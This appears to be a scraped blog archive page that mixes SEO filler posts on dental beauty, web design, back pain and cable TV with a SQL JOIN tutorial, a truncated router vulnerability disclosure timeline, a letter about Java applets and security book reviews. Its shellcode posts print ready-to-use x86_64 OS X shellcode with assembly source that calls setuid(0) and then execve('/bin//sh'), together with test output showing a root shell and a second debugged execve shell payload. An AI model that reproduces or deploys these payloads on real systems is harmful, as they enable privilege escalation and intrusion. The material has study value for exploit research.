Are Perfect Teeth Necessary for Beauty

Dental work is a nightmare for most people but the United States remains one of the most dental oriented societies in the world. There’s a very real social pressure to have the best and brightest white teeth regardless of where you may live in America. The idea of having perfect teeth saturates our culture and is one of the driving points of attractiveness; if not the one defining feature that seems to be shared in the multiple interpretations of what we believe beauty to be as Americans. Have you visited your dentist in Grand Rapids? If not, I bet you feel guilty right now for doing so after being so shamelessly reminded that the beauty equation ends and begins with your teeth. It’s something that I’ve struggled with for years because I don’t have straight teeth. There’s very few women who are going to find it endearing and only a handful of women I have dated have thought that it was an attractive part of my features.

There’s nothing at all wrong with having great teeth. (more…)

Choosing a Good Web Design Team for Your Business

I remember building my first website as a young man. It was fun to spend all those hours learning how to do it. My main motivation was to show off for friends and family. I built a bunch of websites that were very basic, but they looked like masterpieces to people who knew nothing about the Internet or websites. I am very embarrassed about my efforts. I never went anywhere with it even though I considered I might make it a career back then. The company I own as an adult uses a firm that does website design in Michigan. I could not even begin to build anything now. I barely even remember a couple of basic HTML tags.

The point I am making is that we should leave some things to professionals. We should consult with people that have a proven track record of performance. I remember the early days of the Internet where small business owners were allowing employees or relatives with some web experience to build them an online presence. That never was a good idea. (more…)

Server Management for New Business Website

It has taken a lot of work and dedication from a couple of my employees, but the new website for our company is finally ready to be launched. It is a day that I have looked forward to, because this has been a long time in the making and I have worried that it would not turn out as intended. We need to hire server management for the new website though, because I do not want my employees to have to worry about keeping the website running. They have other things to attend to, and I feel like too much of their time has already been devoted to this project, to expect them to put more time into it going forward.

The real vision of the new website was what took so much effort to develop. (more…)

My Wife Figured out What Would Help

Hitachi wand massagerI had tried a couple of things try to fix the trouble I was having with my neck and back. I was at my wit’s end. I was not really sure what else to do. My wife said that I should try a Hitachi wand massager to see if that would do anything for me. I had not though about that previously, but was not really sure it would do me any good. I told her I would try it if things grew worse.

I first went to my doctor when I began having pain. The pain had been going on for at least three weeks. I even spent about three of those days in bed near the end of those three weeks. I could barely move because I hurt so much. I knew that I could not take any time off of work, so quickly made the doctor’s appointment. My doctor said that I probably strained my back at work because I do heavy lifting. (more…)

Thinking About Dumping My Cable Tv

Cable TV guideThinking about dumping my cable tv, but I am not sure what would be the best thing to do instead. Of course I watch a lot of live sports and that is the thing that really keeps people from cutting the cable on Time Warner and Comcast and those other pirates. Everything else you can get off the internet of you can get you a Digital Video Recorder like the Direct TV Genie and record it, then you play it back and skip through the ads. Obviously that sort of defeats the whole purpose of most tv programs. (more…)

SQL ON

The SQL ON clause is used to create JOIN queries  when information are located in different tables, i.e. allows to join related data tables by specifying a condition that involves a key field that identifies both tables, the key field contains data that is found in the first table and  in the second table, and therefore both tables are related by this key field. Is optional you have these fields defined as a FOREIGN KEY between two tables, what is essential is that there are two fields that have the data to identify the records from both tables.

Following is the general syntax to use the SQL ON clause for  two tables, using the JOIN query:

SELECT fieldNamess FROM table_1 AS one

     JOIN table_2 AS two

     ON one.field = two.field

 

When the type of JOIN (INNER, LEFT, RIGHT) is not specified the default JOIN is INNER JOIN, which returns a record when it meets the condition of the JOIN specified in the operator ON.

In the following example we are using the AdventureWorks database, to get the name of the territory for the customers. The required information is contained in the tables, Sales.Customer and Sales.SalesTerritory, the field that will serve as a JOIN condition is TerritoryID, which will be used in the SQL ON operator. This field will allow us to relate data from both tables. In the table definition, Sales.Customer has a FOREIGN KEY with theSales.SalesTerritory table.

In the result query we will get the ID and customer type as well as the account number  from the Sales.Customer table and the name of the territory from the Sales.SalesTerritory table. The JOIN syntax is as follows:

SELECT  C.CustomerID , C.CustomerType ,C.AccountNumber ,T.Name    FROM Sales .SalesTerritory AS T

INNER JOIN Sales .Customer AS C

ON T.TerritoryID = C.TerritoryID

As we see the INNER JOIN operator is used to mention the second table where we will find the additional information, later in the JOIN condition we use the  SQL ON operator, placing the field that will allow us to join the information from the two tables. In the image we can see the output of the query:

{ 0 comments }

T-Mobile 4G Hotspot Multiple Vulnerabilities

About

Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.

Link to Product on T-Mobile’s Website

Timeline

  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.

(more…)

My Plea to Oracle: Axe Java Applets

Hi Oracle,

We’ve got a bit of problem: applets.

You see, almost every recent security vulnerability and recent hack – Facebook, Apple, NYT – has been because of your support for applets.

Just to name a few, there’s CVE-2012-3213,CVE-2012-3342,CVE-2013-0351,CVE-2013-0409,CVE-2013-0419,CVE-2013-0423,CVE-2013-0424,CVE-2013-0425,CVE-2013-0426,CVE-2013-0427,CVE-2013-0428,CVE-2013-0429,CVE-2013-0432,CVE-2013-043,CVE-2013-0434,CVE-2013-0435,CVE-2013-0438,CVE-2013-0440,CVE-2013-0441,CVE-2013-0442,CVE-2013-0443,CVE-2013-0445,CVE-2013-0450,CVE-2013-1473,CVE-2013-1475,CVE-2013-1476,CVE-2013-1478,CVE-2013-1480,CVE-2013-1481,CVE-2013-1486,CVE-2013-1487,CVE-2013-1488.

I’ve been developing in Java for many years and I can attest that nobody uses applets anymore. It’s old outdated technology that needs to go away. It’s too heavy of a platform to deliver web applications. The future of web technology is light weight. The future is HTML5, Javascript, and CSS3.

We all make mistakes and nobody is going to blame you (except maybe the malware authors) for getting rid of applets.

Do it! Axe it!

Sincerely,
Security Enthusiast and Java Developer
Dustin Schultz

Java Facepalm

It’s been a while since I’ve blogged but I couldn’t resist with the latest Java vulnerability. I saw the proof of concept code posted by jduck last night (here) and thought this looks like normal Java code to me (I develop in Java at my day job). Well it turns out…this is normal Java code!

(more…)

50 Byte x86_64 OS X setuid execve Null Free Shellcode

More smaller shellcode, this time, tested and verified working on OSX 10.7.

Shellcode

/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz - TheXploit.com
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
"\x0f\x05";

Source

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel
add r8, 0x24                    ; 0x24+r8=0x200003b
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx, null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rdi, rsp                    ; null terminated /bin/sh pointer
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rsi, rsp                    ; null terminated /bin/sh pointer
syscall                         ; invoke kernel

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s 
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out
bash-3.2# 

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out 
a.out:
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 
0000000100000fb6 0f 05 

Enjoy!

Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

; File: shell.s
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
xor rdx, rdx
mov eax, 0x200003b
mov rdi, 0x68732f2f6e69622f
push rsi
push rdi
mov rdi, rsp
syscall

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11
dustin@sholtz:~$ 

otool has the same output:

dustin@sholtz:~$ otool -tv static 
static:
(__TEXT,__text) section
start:
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
non-static:
(__TEXT,__text) section
start:
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

Update
As pointed out in the comments, I was not initializing rsi correctly! Thanks for pointing that out. The fix was to add this before the last syscall:

push rdx
push rdi
mov rsi, rsp

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
___mac_execve:
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
___mac_get_fd:
00000000000168ac	movl	$0x02000184,%eax
--
_execve:
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
_fchdir:
00000000000173f4	movl	$0x0200000d,%eax
dustin@sholtz:~$ 

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting setup but this is definitely where the syscall number is getting moved into rax. It moves whatever was in rcx because it gets smashed by the kernel when syscall is invoked.

Book Review: Practical Malware Analysis

I’ve been dying to get this review out for a while now. There’s so much good and deep content in this book, that reading it on nights after work and weekends took longer than expected! I’ll tell you now that if you’re into computers and computer security, this book won’t let you down.This book is like having your very own personal malware analysis teacher without the expensive training costs.

About the Book

The book material is exhaustingly complete with 21 chapters + appendices covering everything from static analysis, environment setup, x86 assembly to anti-disassembly and anti-virtual machine practices. Total book content, minus lab solutions comes in at an enormous 475 pages (with lab solutions, 732 pages) . Let’s just say that you better be prepared to eat, breathe, and live malware analysis for quite some time. The skill level for the book is targeted at someone with experience in programming and security although an ambitious beginner should do fine. (more…)

Half way through Practical Malware Analysis

I’m about half way through Practical Malware Analysis and let me just say … this book is awesome! Quote me on this: I guarantee this book will go down in history as one of the best in its class. Look out for my full review!

Book Review: Hacking and Securing iOS Applications

About the Book

Hacking and Securing iOS Applications is a recently released book by Jonathan Zdziarski. This book is aimed to teach you how to

  • Compromise an iOS device
  • Steal the filesystem of an iOS device
  • Abuse the Objective-C runtime
  • Defeat iOS built in encryption
  • Protect your own applications

and much, much, more! The book comes in at just shy of 400 pages. Each chapter is broken into a specific topic and builds on previous chapters. However, there are a few chapters which are self contained and could be read without prior knowledge (e.g. Chapter 13 – Jailbreak Detection).

Audience, Skill Level, & Prereqs

This book is targeted at app developers and the how-does-ios-work-and-how-can-I-manipulate-it type person (I try not to use the term “Hacker”). Jonathan also uses the term tinkers – I like that one too!
(more…)

Go to Top